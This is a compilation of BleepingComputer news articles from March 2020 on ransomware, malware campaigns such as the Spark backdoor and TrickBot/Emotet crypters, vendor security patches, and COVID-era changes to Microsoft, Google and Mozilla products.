"If network defenders can detect and remediate the initial compromise quickly, it is possible to avoid the significant damage and cost of a ransomware infection."


Ransomware Gangs to Stop Attacking Health Orgs During Pandemic
22
.3.2020  Bleepingcomputer  Ransomware

Some Ransomware operators have stated that they will no longer target health and medical organizations during the Coronavirus (COVID-19) pandemic.

Last night, BleepingComputer reached out to the operators of the Maze, DoppelPaymer, Ryuk, Sodinokibi/REvil, PwndLocker, and Ako Ransomware infections to ask if they would continue targeting health and medical organizations during the outbreak.

Below is what two of them said. Whether they plan on keeping their promise will have to be seen.

DoppelPaymer Ransomware
DoppelPaymer was the first to respond and stated that they do not normally target hospitals or nursing homes and will continue this approach during the pandemic.

"We always try to avoid hospitals, nursing homes, if it's some local gov - we always do not touch 911 (only occasionally is possible or due to missconfig in their network) . Not only now.

If we do it by mistake - we'll decrypt for free. But some companies usually try to represent themselves as something other: we have development company that tried to be small real estate, had another company that tried to be dog shelter ) So if this happens we'll do double, triple check before releasing decrypt for free to such a things. But about pharma - they earns lot of extra on panic nowdays, we have no any wish to support them. While doctors do something, those guys earns."

When asked what happens if a medical organization gets encrypted, we were told that a victim should contact them on their email or Tor webpage to provide proof and get a decryptor.

Maze Ransomware
Today, the Maze operators responded to my questions by posting a "Press Release" that also states that they will stop all "activity" against all kinds of medical organizations until the end of the pandemic.

"We also stop all activity versus all kinds of medical organizations until the stabilization of the situation with virus."

We have not received a reply as to whether a free decryptor would be provided if a healthcare organization mistakenly gets encrypted.

Security companies offer free help
For now, if any organizations get encrypted, both Emsisoft and Coveware announced today that they would be offering their ransomware services for free to healthcare organizations during the pandemic.

This includes the following:

Technical analysis of the ransomware.
Development of a decryption tool whenever possible.
As a last resort ransom negotiation, transaction handling and recovery assistance, including replacement of the decryption tool supplied by the criminals with a custom tool that will recover data faster and with less chance of data loss.
While this help is greatly appreciated, I hope other ransomware operators will stop targeting healthcare organizations after reading this article so that it is not needed.

As this is a global epidemic, anyone could become sick with this virus, including the ransomware operator's loved ones.

Right now healthcare workers need to focus on helping people, not decrypting their files.


Hackers Hide Malware C2 Communication By Faking News Site Traffic
22
.3.2020  Bleepingcomputer  Virus

A cyber-espionage group active since at least 2012 used a legitimate tool to shield their backdoor from analysis attempts to avoid detection. In their effort, the hackers also used a fake host header named after a known news site.

The backdoor is referred to by the names Spark and EnigmaSpark and was deployed in a recent phishing campaign that appears to have been the work of the MoleRATs group, the low-budget division of the Gaza Cybergang. This is the actor responsible for operation SneakyPastes, detailed by Kaspersky, which relied on malware hosted on free sharing services like GitHub and Pastebin.

There are strong indications that the group used this backdoor since March 2017, deploying dozens of variants that contacted at least 15 command and control domains.

Researchers from multiple cyber security tracked the campaigns from this threat actor and analyzed the malware, tactics, and infrastructure used in the attacks.

Evasion tactics
The threat actor tried to hide signs of compromise using the Enigma Protector software - a legitimate tool for “protecting executable files from illegal copying, hacking, modification, and analysis.”

Based on the targets observed and the theme in the documents used for lures, this looks like a politically-motivated attack aimed at Arabic speakers interested in Palestine’s potential acceptance of the peace plan.

“Adversaries using EnigmaSpark likely relied on recipients’ significant interest in regional events or anticipated fear prompted by the spoofed content, illustrating how adversaries may exploit ongoing geopolitical events to enable malicious cyber activity” - IBM X-Force Incident Response and Intelligence Services (IRIS)

The infection chain leading to installing the EnigmaSpark backdoor started with the delivery of a malicious Microsoft Word document. The file is written in Arabic and prompts the recipient to enable editing to view the content.

The researchers found that the document gets from a Google Drive link a malicious Word template embedded with a macro for delivering the final payload ‘runawy.exe.’

source: IBM X-Force IRIS
To protect the operation, the hackers added some defenses such as protecting the macro with a password and applying base64 encoding scheme on the backdoor, which was also stored on Google Drive.

Additionally, the malware binary was packed with Enigma Protector that adds some resistance to hacking and cracking attempts.

Another precaution from the hackers is the use of a fake host header in the HTTP‌ POST request that delivers victim system info to the command and control (C2) server, which was ‘nysura].[com.’ However, the header shows ‘cnet].[com’ as the destination.

Common denominator
An X-Force (IRIS) investigation revealed that the attacker used this technique with other binaries. After unpacking ‘runawy.exe,’ they noticed that the resulting file was the same as ‘blaster.exe,’ a binary delivered by an executable packed by Themida, another legitimate tool that adds protection against inspecting or modifying a compiled application.

Multiple files were discovered because they had in common the unique string “S4.4P” and the cryptographic certificate signer “tg1678A4”: Wordeditor.exe, Blaster.exe (the unpacked version of runawy.exe and soundcloud.exe), HelpPane.exe, and taskmanager.exe.

In the case of Blaster, the same trick with the fake host header was used as in the case of ‘runawy,’ but the real destination server was different (’webtutorialz[.]com’).

source: IBM X-Force IRIS
Previous research
The ‘runawy.exe’ binary file, its C2 server, and the unique string have been previously documented by researchers at other cyber security companies.

Cybereason’s Nocturnus team on February 12 published a technical analysis of the Spark backdoor, detailing the capabilities of the malware:

Collect information about the victim host
Encrypt collected data and sending it to the attackers over the HTTP protocol
Download other payloads
Log keystrokes Record audio using the system’s built-in microphone
Execute commands on the infected machine
At the beginning of the month, Palo Alto Networks detailed the same Enigma-packed runawy payload that was delivered with the help of a Word document on October 31 and November 2, 2019.

The Spark backdoor was initially documented by researchers at Beijing-based Qi An Xin cyber security company, with an English version of the research published on February 14, 2019.

Researchers from all these companies attribute the Spark backdoor to the MoleRATs group, known for using malware available on hacker forums. However, they also develop custom tools, such as Spark.


Google Prioritizes Security Updates After Halting Chrome Releases
22
.3.2020  Bleepingcomputer  Security

Google has announced today that the release of future Chrome and Chrome OS versions is temporarily paused because of adjusted work schedules caused by employees having to work from home due to the novel coronavirus pandemic.

"Due to adjusted work schedules at this time, we are pausing upcoming Chrome and Chrome OS releases," the announcement published on the Chrome Releases blog says.

"Our primary objectives are to ensure they continue to be stable, secure, and work reliably for anyone who depends on them."

Chrome Developers

@ChromiumDev
Due to adjusted work schedules, we’re pausing upcoming Chrome & Chrome OS releases. Our goal is to ensure they continue to be stable, secure, & reliable for anyone who depends on them. We’ll prioritize updates related to security, which will be included in Chrome 80. Stay tuned.

568
6:01 PM - Mar 18, 2020
Twitter Ads info and privacy
273 people are talking about this
Focus on security updates for Chrome v80
The Google Chrome development team will continue to work remotely throughout the current novel coronavirus outbreak and will prioritize security updates that will be released as Chrome v80 updates.

"We’ll continue to prioritize any updates related to security, which will be included in Chrome 80," Google added.

As proof, Google Chrome 80.0.3987.149 was released right after the company announced that Chrome v81 was delayed, with security fixes patching 13 high severity vulnerabilities.

In a tweet from earlier today on the Chrome Developers Twitter account, users are encouraged to monitor the Chrome Releases Blog for new developments and any new info regarding upcoming Chrome and Chrome OS releases.

Chrome Developers

@ChromiumDev
Please keep an eye on the Chrome Release Blog - https://chromereleases.googleblog.com/ - for updates and additional info.

42
6:26 PM - Mar 18, 2020
Twitter Ads info and privacy
20 people are talking about this
Chrome v81 announcement posts removed
Google Chrome v81 was supposed to start rolling out on March 17th according to a post initially published on the Google Developers blog yesterday.

The new Chrome version should have included support for form elements featuring a modernized look, hit testing for augmented reality, app icon badge support, and initial support for Web NFC.

A full list of Chrome 81 feature deprecations and removals is also available on the Chrome Platform Status page.

Google Play Console warning
Google Play Console warning (AndroidPolice)
On Monday, Google also informed Android developers that they will be experiencing longer than normal app review times due to adjusted work schedules.

As the developers were warned, some of their apps will go through the review process in seven days or more starting this week as reported by AndroidPolice.

"Due to adjusted work schedules at this time, we are currently experiencing longer than usual review times," said A Google spokesperson. "While the situation is currently evolving, app review times may fluctuate, and may take 7 days or longer."


Trickbot, Emotet Malware Use Coronavirus News to Evade Detection
22
.3.2020  Bleepingcomputer  Virus

The TrickBot and Emotet Trojans have started to add text from Coronavirus news stories to attempt to bypass security software using artificial intelligence and machine learning to detect malware.

Before malware is distributed in phishing campaigns or other attacks, developers commonly use a program called a 'crypter' to obfuscate or encrypt the malicious code.

This is done in the hopes that it makes the malware appear to be harmless and thus FUD (Fully UnDetectable) to antivirus software.

This was shown to be particularly useful against security software that utilizes machine-learning or artificial intelligence to detect malicious programs.

TrickBot, Emotet uses text from Coronavirus news stories
In January 2020, it was discovered that crypters for the TrickBot and Emotet Trojans were using text from news stories about President Trump's impeachment.

This week, BleepingComputer discovered that the crypters for TrickBot and Emotet have switched to news stories about the Coronavirus pandemic.

For example, TrickBot samples seen by BleepingComputer utilizes strings taken from CNN news stories as part of the malware's file description.

Copyright passengers were sent to government quarantine centers
Product The restrictions will ban travel to the US from 26 European countries
Description Singapore has 187 confirmed cases of the virus
Original Name Just because someone who had the coronavirus
Internal Name Just this week, the Grand Princess cruise ship docked
File Version 1.0.0.1
We also saw an Emotet sample that uses strings from a CNN news story for its file information.

Copyright different times than the WHO
Product The spike is partly due to a broader definition
Description These numbers are cumulative since Jan. 21 and include people with travel history to China
Original Name n Wednesday, China reported far fewer cases of the novel coronavirus
Internal Name Two California cases and the Texas case are among evacuees from China
File Version 1, 0, 0, 1
This information is then shown in the Details tab of the malware's properties as shown below.

File properties for new TrickBot and Emotet samples
File properties for new TrickBot and Emotet samples
It is not known if the use of these strings has been of any benefit to the threat actors, but Vitali Kremez, Head of SentinelLabs, thinks it could be useful against AI/ML security engines.

"By and large, the Coronavirus strings being used by the malware crypter generator deploy public news content as a methodology to frustrate certain machine learning static file parser methodologies. This "goodware" string addition technique allows the criminal crypter operators to create crypted binaries that might allow bypasses of AI/ML engines of certain anti-virus products as it was proved in the Cylance bypass method," Kremez told BleepingComputer via email.

The use of Coronavirus (COVID-19) as part of malware attacks has steeply increased since the outbreak with new phishing scams, ransomware, and malware being deployed.

Everyone should be wary of any emails that they receive, especially those with unsolicited attachments about the Coronavirus.

Update 3/18/20: MalwareHunterTeam told BleepingComputer that this change started about a month ago.


How to Change the Default Search Engine in Microsoft Edge
22
.3.2020  Bleepingcomputer  OS

Microsoft allows Microsoft Edge users to change the default search engine from Bing to another one of their choice, including custom search engines.

When switching search engines, users can select from a variety of pre-configured search engines such as Bing, Yahoo, Google, DuckDuckGo, and Ecosia or create their own.

This article will explain how to switch the search engine for the address bar to a pre-configured one or a custom one that you create.

How to switch the Edge address bar search to another search engine
If you do not wish to use Bing as the default search engine for address bar searches, you can change to another search engine following these steps:

When in Microsoft Edge, go to Settings > Privacy and services > Address Bar.
In the drop-down menu labeled "Search engine used in the address bar", select the search engine you wish to use.
Select search engine used in the address bar
Select search engine used in the address bar
You can now close the settings tab.
After making the change, when you search from the Edge address bar the newly selected search engine will be used instead of Bing.

Manage existing or create new search engines
If a search engine that you wish to use does not exist, you can also create custom search engines to be used as the default address bar search or for using tagged searches, which we will describe below.

To create a custom search engine in Edge, follow these steps:

When in Microsoft Edge, go to Settings > Privacy and services > Address Bar > Manage Search Engines.
You will now be at a page showing all of the configured search engines in Microsoft Edge.

Each search engine consists of a name, a keyword that can be used in the address bar to use that search engine, and the URL that will be used to perform a search.
List of preconfigured search engines
List of pre-configured search engines
To add a custom search engine, click on the Add button and you will be shown a form asking for various information.

The Search Engine field is simply the name that will be shown when selecting a search engine, the Keyword field is used to perform searches with the engine from the address bar, and the URL is the page on the site that will return the search results.
Create custom search engine
Create a custom search engine
When entering the URL to use for the search query, the variable that accepts the searched-for keyword should be replaced with a %s as shown above.
When done, click on the Save button and the new search engine will be created and can be used in the address bar or selected as the default search engine in Bing.
Using keywords to search using custom search engines
As seen above, when we made a custom search engine, we entered the keyword 'bleepingcomputer' that can be used for tagged searches from the address bar.

For example, even if the default search engine used for address bar searches is set to Bing, we can still search from any other configured search engine by using its keyword.

To do this, we type the assigned keyword in the address bar and then press the Tab key on the keyboard to search directly in that search engine.

Search using Search Engine Keywords
Search using Search Engine Keywords
The other pre-configured search engine keywords that can be used are bing.com, google.com, yahoo.com, duduckgo.com, and ecosia.org. These keywords can be changed in the 'Manage Search Engines' screen.


Microsoft Scales Back Office 365 Features to Handle High Loads
22
.3.2020  Bleepingcomputer  OS

Microsoft is currently scaling down select non-essential Office 365 capabilities in response to the incoming growth in demand and the influx of new Microsoft 365 users caused by the novel coronavirus (COVID-19) pandemic.

According to the MC206581 announcement recently Office 365Admin message center, several changes will be made to prevent users from experiencing outages or issues caused by the high load.

"To best support our Microsoft 365 customers worldwide and accommodate new growth and demand during these unprecedented times, we're making temporary adjustments to select non-essential capabilities," the messages read.

"We do not expect these changes to have significant impact on the end users experience but wanted to make you aware."

Temporary feature adjustments announcement
MC206581 announcement (Microsoft)
Among the features that will get adjusted to lower the load on Microsoft 365 servers, Redmond intends to change:

• how often we check for presence
• the interval in which we show when the other party is typing
• video resolution

Microsoft will tweak these temporary feature adjustments as the current situation changes and the Microsoft 365 servers' load will wind down as users will move away from remote working from home.

"Microsoft is actively monitoring performance and usage trends to ensure we're optimizing service for our customers worldwide, and accommodating new growth and demand," a Microsoft spokesperson told BleepingComputer when asked about the cause of these recent developments.

"At the same time, these are unprecedented times and we’re also looking at what steps we can take to proactively prepare for these high-usage periods."

While there was no mention of it, this announcement comes after an outage of the for teamwork hub in Office 365 Microsoft Teams outage that affected EU and some US users between March 16 and March 17, with reports saying that messages in chat weren't being sent, team member management not working, and the admin portal being unreliable.

Microsoft 365 Status
@MSFT365Status
We're investigating messaging-related functionality problems within Microsoft Teams. Please refer to TM206544 in your admin center for further details. ^JP

253
9:50 AM - Mar 16, 2020
Twitter Ads info and privacy
291 people are talking about this
Even though the issues were thought to be mitigated on March 16 at 5:58 AM, the problems came back about two hours later at 7:46 AM and again at 2:01 AM the next day, after another attempted mitigation by rerouting user connections to alternate systems.

The issue was finally resolved later on March 17 and it was determined that it was a caching issue within a component of the Microsoft Teams infrastructure.

Microsoft announced on March 5th that Microsoft Teams is free for the next six months to help businesses' move towards a remote workplace during the COVID-19 outbreak.

"At Microsoft, the health and safety of employees, customers, partners and communities is our top priority," Microsoft EVP and President JP Courtois stated on Twitter. "By making Teams available to all for free for six months, we hope that we can support public health and safety by making remote work even easier."


Emsisoft, Coveware Offer Free Ransomware Help During Coronavirus Outbreak
22
.3.2020  Bleepingcomputer  Ransomware

Emsisoft and Coveware have announced that they will be offering their ransomware decryption and negotiation services for free to healthcare providers during the Coronavirus outbreak.

With medical facilities, hospitals, and labs already being over capacity and employees working in stressful and dangerous environments, they need all the help they can get.

Unfortunately, some online threat groups and ransomware operators see this as an optimal time to launch attacks on these organizations when they are at their most vulnerable.

This is shown in recent attacks against the United States Health and Human Services Department's HHS.gov site, Illinois Champaign County Public Health Department, and the University Hospital Brno in the Czech Republic.

Giving back when they need it the most
Starting today, Emsisoft and Coveware will offer their ransomware related services to healthcare providers for free.

“This is the worst possible time for a healthcare provider to be impacted by ransomware. We want to ensure that they’re able to return to normal operations as quickly as possible so that patient care is minimally disrupted. We’re all in this together, and both companies and individuals need to be doing whatever they can to help each other.” Emsisoft's Brett Callow told BleepingComputer via email.

Emsisoft offers custom decryption services for their customers who find that paid-for decryptors do not work or if an exploitable weakness is found in a ransomware infection that must be utilized on a case-by-case basis.

For those who find that they need to pay a ransom, Coveware provides negotiation services that can dramatically reduce the demanded ransoms in many cases.

"We have helped hospitals through ransomware attacks during normal times. It is a horrible situation with normal patient activity. It's unfathomable to think about what it would be like during a pandemic. We want to ensure providers have fast access to help with as little friction as possible. It is the least we can do," Coveware CEO Bill Siegel told BleepingComputer.

As part of this offer, the following services will be offered by Emsisoft and Coveware for free to healthcare providers.

Technical analysis of the ransomware.
Development of a decryption tool whenever possible.
As a last resort ransom negotiation, transaction handling and recovery assistance, including replacement of the decryption tool supplied by the criminals with a custom tool that will recover data faster and with less chance of data loss.


Adobe Fixes Nine Critical Vulnerabilities in Reader, Acrobat
22
.3.2020  Bleepingcomputer  Vulnerebility

Adobe has released security updates for Adobe Acrobat and Adobe Reader that fix numerous vulnerabilities ranging from information disclosure to arbitrary code execution.

Adobe usually releases security updates in conjunction with Microsoft's Patch Tuesday security updates, but this month nothing was released at that time.

Today, Adobe has released security updates that fix 13 vulnerabilities, with 4 rated as 'Important' as they lead to information disclosure or privilege escalation.

The other 9 are rated as 'Critical' because they could allow an attacker to create malicious PDFs or other malicious actions that could exploit these vulnerabilities to execute commands on the affected computer.

13 vulnerabilities fixed
The vulnerabilities fixed in 'Security Bulletin for Adobe Acrobat and Reader | APSB20-13' security updates are:

Vulnerability Category Vulnerability Impact Severity CVE Number
Out-of-bounds read   Information Disclosure   Important   
CVE-2020-3804

CVE-2020-3806

Out-of-bounds write Arbitrary Code Execution      Critical CVE-2020-3795
Stack-based buffer overflow Arbitrary Code Execution      Critical CVE-2020-3799

Use-after-free Arbitrary Code Execution  Critical
CVE-2020-3792

CVE-2020-3793

CVE-2020-3801

CVE-2020-3802

CVE-2020-3805

Memory address leak Information Disclosure   Important   CVE-2020-3800
Buffer overflow Arbitrary Code Execution  Critical CVE-2020-3807
Memory corruption Arbitrary Code Execution  Critical CVE-2020-3797
Insecure library loading (DLL hijacking) Privilege Escalation Important   CVE-2020-3803
Adobe recommends users upgrade to the latest versions of Acrobat DC, Acrobat Reader DC, Acrobat 2017, Acrobat Reader 2017, Acrobat 2015, and Acrobat Reader 2015.


VMware Fixes High Severity Privilege Escalation Bug in Fusion
22.3.2020  Bleepingcomputer  Vulnerebility

VMware today released security updates to address high severity privilege escalation and denial-of-service (DoS) in the VMware Workstation, Fusion, VMware Remote Console and Horizon Client.

The two security flaws currently tracked as CVE-2020-3950 and CVE-2020-3951 are due to the improper use of setuid binaries and a heap-overflow issue in Cortado Thinprint.

Fixed bugs could lead to privilege escalation and DoS attacks
CVE-2020-3950 reported by Jeffball of GRIMM and Rich Mirch was rated by VMware with a CVSSv3 base score of 7.3 and it was evaluated to be in the Important severity range.

This flaw impacts the VMware Fusion (11.x before 11.5.2), VMware Remote Console for Mac (11.x and prior before 11.0.1) and Horizon Client for Mac (5.x and prior before 5.4.0) macOS apps.

"Successful exploitation of this issue may allow attackers with normal user privileges to escalate their privileges to root on the system where Fusion, VMRC or Horizon Client is installed," explains VMware's security advisory.

The denial of service vulnerability found in Cortado Thinprint and reported by FireEye's Dhanesh Kizhakkinan affects the VMware Workstation (15.x before 15.5.2) Windows and Linux apps, as well as the Horizon Client for Windows (5.x and prior before 5.4.0).

"Attackers with non-administrative access to a guest VM with virtual printing enabled may exploit this issue to create a denial-of-service condition of the Thinprint service running on the system where Workstation or Horizon Client is installed," as described by VMware.

To fix the two security issues, you have to apply the patches listed in the 'Fixed Version' column of the 'Resolution Matrix' available in the
VMSA-2020-0005 advisory.

Critical Guest-to-Host DoS bug fixed last week
Last week, VMware also patched a critical use-after-free vmnetdhcp vulnerability in VMware Workstation (15.x before 15.5.2) and Fusion (11.x before 11.5.2) that could lead to code execution on the host system from the guest environment when exploited.

This security flaw was found by an anonymous Trend Micro Zero Day Initiative researcher in the Windows vmnetdhcp service, which is used to assign IP addresses to the guest host via the Dynamic Host Configuration Protocol (DHCP).

The flaw tracked as CVE-2020-3947 could also allow potential attackers to create a denial-of-service condition of the vmnetdhcp service running on unpatched host machines.

Due to this vulnerability's critical nature, it is strongly recommended that users upgrade their VMware Workstation software to version 15.5.2 as soon as possible to prevent future attacks.

Update March 18, 13:48 EDT: Security researcher Rich Mirch told BleepingComputer that the latest released VMware Fusion 15.5.2 doesn't fix the CVE-2020-3950 EoP vulnerability. VMware says that they are aware and working on a new update.

Update March 19, 09:15 EDT: VMware has published KB78294 with additional instructions to be applied to mitigate exploitation of the CVE-2020-3950 VMware Fusion setuid security vulnerability. The next release of Fusion will contain a complete fix.


Firefox Password Manager To Be Secured With Windows 10 Credentials
22
.3.2020  Bleepingcomputer  Safety

Mozilla is making changes to the Firefox Lockwise password manager so that users will need to enter their Windows 10 credentials before being allowed to edit or view saved logins.

One of the biggest problems with browser password managers is that they offer no protection from a person who gains local access to a PC.

Once a person has access to a PC and thus their browser, they can easily access the saved login credentials without being prompted to enter a password or other credentials.

Windows 10 credentials used to secure Lockwise
To resolve this, in the latest Mozilla Firefox Nightly build 76.0a1, when a Windows user attempts to view, copy, or edit saved login credentials in the Lockwise password manager, they will first be prompted to enter their Windows 10 login credentials.

Lockwise prompt for Windows 10 credentials
Lockwise prompt for Windows 10 credentials
If a user does not know the password, PIN, or other configured authentication credentials, Firefox will not allow the user to view the credentials.

This method effectively secures the Lockwise password manager so that a local user can not read through the machine owner's saved credentials.

The only caveat is if a user plans on looking up their credentials for numerous accounts in a row, they will currently need to enter their Windows 10 credentials each time.


US Commerce Dept Shares Tips On Securing Virtual Meetings
21.3.2020 
Bleepingcomputer  BigBrothers

The US National Institute of Standards and Technology (NIST) today shared a number of measures that should be taken by remote workers to prevent eavesdropping and protect their privacy during virtual meetings while working from home during the current COVID-19 pandemic.

Jeff Greene, the director of the National Cybersecurity Center of Excellence (NCCoE) at the NIST said that "if virtual meetings are not set up correctly, former coworkers, disgruntled employees, or hackers might be able to eavesdrop."

"Using some basic precautions can help ensure that your meetings are an opportunity to collaborate and work effectively – and not the genesis of a data breach or other embarrassing and costly security or privacy incident."

Boost your online meetings' security
Greene suggests taking advantage of your conferencing software's built-in security features, as well as of suggestions provided by their developers to boost virtual meetings' security.

NCCoE's director recommends considering multi-factor authentication (MFA) whenever available and to make use of a dashboard to keep a close eye on your meeting's attendees.

Limiting the reuse of meeting access codes and enabling notifications on attendees joining in to be able to quickly identify those who shouldn't be attending.

The list of measures to be taken to prevent eavesdropping by unauthorized parties according to the NIST:

• Follow your organization’s policies for virtual meeting security.
• Limit reuse of access codes; if you’ve used the same code for a while, you’ve probably shared it with more people than you can imagine or recall.
• If the topic is sensitive, use one-time PINs or meeting identifier codes, and consider multi-factor authentication.
• Use a “green room” or “waiting room” and don’t allow the meeting to begin until the host joins.
• Enable notification when attendees join by playing a tone or announcing names. If this is not an option, make sure the meeting host asks new attendees to identify themselves.
• If available, use a dashboard to monitor attendees – and identify all generic attendees.
• Don’t record the meeting unless it’s necessary.
• If it’s a web meeting (with video):
- Disable features you don’t need (like chat or file sharing).
- Before anyone shares their screen, remind them not to share other sensitive information during the meeting inadvertently.
When you know that sensitive information will be shared between the attendees of a specific virtual meeting, you can also take the following additional measures to further increase security:

• Using only approved virtual meeting services.
• Issuing unique PINs or passwords for each attendee and instructing them not to share them.
• Using a dashboard feature so you can see who all the attendees are at any time.
• Locking the call once you have identified all the attendees and lines in use.
• Encrypting recordings, requiring a passphrase to decrypt them, and deleting recordings stored by the provider.
• Only conducting web meetings on organization-issued devices.
NIST provides a separate collection of telework security resources designed to assist remote workers including a guide to enterprise telework and BYOD security, an infographic on securing conference calls, guidance on mobile security, and security configurations and checklists.

CISA tips on securing enterprise VPNs
The DHS Cybersecurity and Infrastructure Security Agency (CISA) also shared tips on how to secure enterprise virtual private networks (VPNs) in response to the increasing number of employees working from home in response to the current COVID-19 pandemic.

CISA advised organizations to keep their VPN software, network devices, and user devices up to date, to alert their employees of any phishing attacks, as well as to make sure that their security teams are up to speed when it comes to security incident detection and response.

Also, CISA recommended implementing MFA on VPN connections or require users to use strong passwords as a defense measure against attacks.

Enterprises were also encouraged to test their VPN infrastructure in advance to assess its capability to support an increased number of users.

As part of its teleworking guidance, the DHS cybersecurity agency also suggested reviewing CISA documentation on how to secure network infrastructure devices, avoid social engineering and phishing attacks, as well as to choose, protect and supplement passwords.

To assist the wave of new remote workers, Software developers and service providers including Google, Microsoft, Adobe, Zoom, and LogMeIn, are also offering free licenses or enhanced versions of their software and services during Coronavirus-disease outbreak.


Windows 10 Secured-Core PCs Can Block Driver-Abusing Malware
21.3.2020 
Bleepingcomputer  Virus

Microsoft says that Windows 10 Secured-core PCs can successfully defend their users against malware designed to take advantage of driver security flaws to disable security solutions.

"Multiple malware attacks, including RobbinHood, Uroburos, Derusbi, GrayFish, and Sauron, and campaigns by the threat actor STRONTIUM, have leveraged driver vulnerabilities (for example, CVE-2008-3431, CVE-2013-3956, CVE-2009-0824, CVE-2010-1592, etc.) to gain kernel privileges and, in some cases, effectively disable security agents on compromised machines," Microsoft says.

However, according to Microsoft, endpoint devices can be defended against such attacks if you are using a Secured-core PC that comes with built-in protection against firmware attacks that have been increasingly used by both state-sponsored hacking attacks and commodity malware.

Secured-core PCs were released as a solution to the number of increasing firmware security issues that attackers can exploit to bypass a Windows machine's Secure Boot, as well as to the lack of visibility at the firmware level commonly present in today's endpoint security solutions.

Malware abusing vulnerable firmware and drivers
"In addition to vulnerable drivers, there are also drivers that are vulnerable by design (also referred to as 'wormhole drivers'), which can break the security promise of the platform by opening up direct access to kernel-level arbitrary memory read/write, MSRs," Microsoft adds.

"In our research, we identified over 50 vendors that have published many such wormhole drivers. We actively work with these vendors and determine an action plan to remediate these drivers."

One instance of a threat actor abusing firmware vulnerabilities is the Russian-backed APT28 cyber-espionage group (also tracked as Tsar Team, Sednit, Fancy Bear, Strontium, and Sofacy) who used a Unified Extensible Firmware Interface (UEFI) rootkit dubbed LoJax during some of its 2018 operations.

More recently, the operators behind the RobbinHood Ransomware exploited a vulnerable GIGABYTE driver to elevate privileges and install malicious unsigned Windows drivers that allowed them to terminate antivirus and security software processes on compromised systems.

RobbinHood Ransomware attack chain
RobbinHood Ransomware attack chain (Microsoft)
"In this attack scenario, the criminals have used the Gigabyte driver as a wedge so they could load a second, unsigned driver into Windows," Sophos researchers explained at the time.

"This second driver then goes to great lengths to kill processes and files belonging to endpoint security products, bypassing tamper protection, to enable the ransomware to attack without interference."

This tactic enabled the attackers to circumvent anti-ransomware defenses by killing the antivirus software before deploying the ransomware executable used to encrypt the victim's documents.

Sophos was unable to fully analyze this ransomware sample so far therefore the processes and services that are being targeted are currently unknown.

Secured-core PCs feature built-in protection
As Microsoft says, however, Windows 10 comes with hardware and firmware protection features that can successfully fight against attacks such as the one that infected victims with Lojax and RobbinHood Ransomware.

Moreover, Secured-core PCs introduced by Microsoft in October 2019 in partnership with OEM partners Lenovo, HP, Dell, Panasonic, Dynabook, and Getac can block firmware-level attacks as they come with these hardware-backed security features enabled by default removing the need for users to make the required BIOS and OS settings changes manually.

"Because both BIOS settings and OS settings are enabled out of the box with these devices, the burden to enable these features onsite is removed for customers," Microsoft adds, with the following features being turned on all Secured-core PCs:

Security promise Technical features
Protect with hardware root of trust TPM 2.0 or higher
TPM support enabled by default
Virtualization-based security (VBS) enabled
Defend against firmware attack Windows Defender System guard enabled
Defend against vulnerable and malicious drivers Hypervisor-protected code integrity (HVCI) enabled
Defend against unverified code execution Arbitrary code generation and control flow hijacking protection [CFG, xFG, CET, ACG, CIG, KDP] enabled
Defend against limited physical access, data attacks Kernel DMA protection enabled
Protect identities and secrets from external threats Credential Guard enabled
However, users of other devices can also take advantage of similar protection if they configure their hardware and Windows security features correctly.

"Specifically, the following features need to be enabled: Secure boot, HVCI (enables VBS), KDP (automatically turned on when VBS is on), KDMA (Thunderbolt only) and Windows Defender System Guard," Microsoft explains.

"With Secured-core PCs, however, customers get a seamless chip to cloud security pattern that starts from a strong hardware root of trust and works with cloud services and Microsoft Defender ATP to aggregate and normalize the alerts from hardware elements to provide end-to-end endpoint security."


Windows Terminal v0.10 Released with Mouse Input Support
21.3.2020 
Bleepingcomputer  OS

​Microsoft has released Windows Terminal v0.10 for Windows 10 that includes some very useful features including full mouse input support and the ability to split a screen by using a keyboard combination.

With this release, Microsoft has added full mouse input support so that you can use terminal programs that support the mouse such as Midnight Command (shown below), Tmux, and other programs.

With this support, you can simply click on a button, file, or screen with your mouse to switch between them as shown by the image below.

Mouse Support in Midnight Commander
Mouse Support in Midnight Commander
To use the mouse to select text for copying, you need to hold down the Shift key while selecting the text.

Microsoft has also added support for a split-screen keybinding that allows you to easily split the currently selected terminal session.

To do this you would add the "duplicate" option to a keybinding that issues the "splitPane" command. An example keybinding that sets the Ctrl+Shift+D keyboard combination to perform this command is seen below.

"keybindings": [
{"keys": ["ctrl+shift+d"], "command": {"action": "splitPane", "split": "auto", "splitMode": "duplicate"}}
]
Illustrating the duplicate option of splitPane
Illustrating the duplicate option of splitPane
This release also fixes the following bugs:

The text behavior when it reflows on resizing of the window is significantly improved!
The borders when using dark themes aren’t white anymore!
If you have the taskbar auto-hidden and your Terminal is maximized, the taskbar now appears when you mouse over the bottom of the screen.
Azure Cloud Shell can now run PowerShell, accept mouse input, and follow the desired shell of your choice.
Touchpad and touchscreen scrolling now moves at a normal pace.
Users who want to try the new features of Windows Terminal v0.10 can update it now from the Microsoft Store.


Windows 10 Cumulative Update KB4541331 Released
21.3.2020 
Bleepingcomputer  OS

If you're still using the dated Windows 10 October 2018 Update, which was released in November 2018, a new cumulative update is now available for your device.

Microsoft has released KB4541331 optional update for Windows 10 version 1809 to fix a bug that causes printing issues, prevents the touch keyboard from appearing during sign in, and several other problems.

KB4541331 will advance your computer to Windows 10 Build 17763.1131 and it will install only after you check for updates manually.

Like every Windows Update, you can open the Settings app and click on the Windows Update option to install the patches. If you own multiple PCs or if you would like to patch the PCs manually, you can learn more about it here.

Here's what new and improved in KB4541331:

Addresses an issue that causes an error when printing to a document repository.
Addresses a drawing issue with the Microsoft Foundation Class (MFC) toolbar that occurs when dragging in a multi-monitor environment.
Addresses an issue that prevents the touch keyboard from appearing during sign in when the user is prompted for the password.
Addresses an issue that causes new child windows to flicker and appear as white squares on server devices that are configured for stark visual contrast.
Addresses an issue that displays incorrect folder properties in File Explorer when the path is longer than MAX_PATH.
Addresses an issue that causes calendar dates to appear on the wrong day of the week in the clock and date region of the notification area when you select the Samoa time zone.
Addresses an issue with reading logs using the OpenEventLogA() function.
Addresses an issue that prevents machines that have enabled Credential Guard from joining a domain. The error message is "The server's clock is not synchronized with the primary domain controller's clock."
Addresses an issue that might cause a delay of up to two minutes when signing in or unlocking a session on Hybrid Azure Active Directory-joined machines.
Addresses an issue that causes authentication to fail when using Azure Active Directory and the user’s security identifier (SID) has changed.
Addresses an issue that might cause domain controllers (DC) to register a lowercase and a mixed or all uppercase Domain Name System (DNS) service (SRV) record in the _MSDCS. DNS zone. This occurs when DC computer names contain one or more uppercase characters.
Addresses an issue that causes authentication in an Azure Active Directory environment to fail and no error appears.
